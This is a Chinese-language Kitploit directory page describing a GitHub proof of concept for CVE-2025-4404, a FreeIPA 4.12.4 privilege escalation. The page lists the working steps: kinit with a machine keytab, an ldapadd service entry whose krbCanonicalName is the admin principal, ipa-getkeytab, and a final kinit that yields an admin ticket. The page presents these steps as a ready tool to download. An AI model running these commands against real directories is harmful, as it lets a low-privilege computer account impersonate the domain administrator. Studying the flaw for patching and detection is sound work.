Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4404-POC — CVE-2025-4404 的 PoC | Kitploit
工具/GitHubGitHub/im10n/cve-2025-4404-poc
权限提升漏洞分析漏洞利用渗透测试身份验证
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

CVE-2025-4404 的 PoC

查看仓库
621年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4404 POC

CVE-2025-4404 的概念验证

如果你有一个域计算机帐户(host/pc1.[email protected]),则默认可以添加服务。并且你可以设置 krbPrincipalName 和 krbCanonicalName。默认情况下,FreeIPA 4.12.4 管理员帐户缺少 krbCanonicalName 属性值。你可以使用 krbPrincipalName 的值请求 Kerberos 票据,但票据将包含 krbCanonicalName 的值。

开始

  1. 首先,我们将代表计算机帐户请求一张票据: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. 添加到 LDAP 服务帐户:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. 请求密钥表
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. 请求票据 $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

搞定!!!

你可以通过以下命令检查票据: ldapwhoami -H ldap://dc1.test.local

下载工具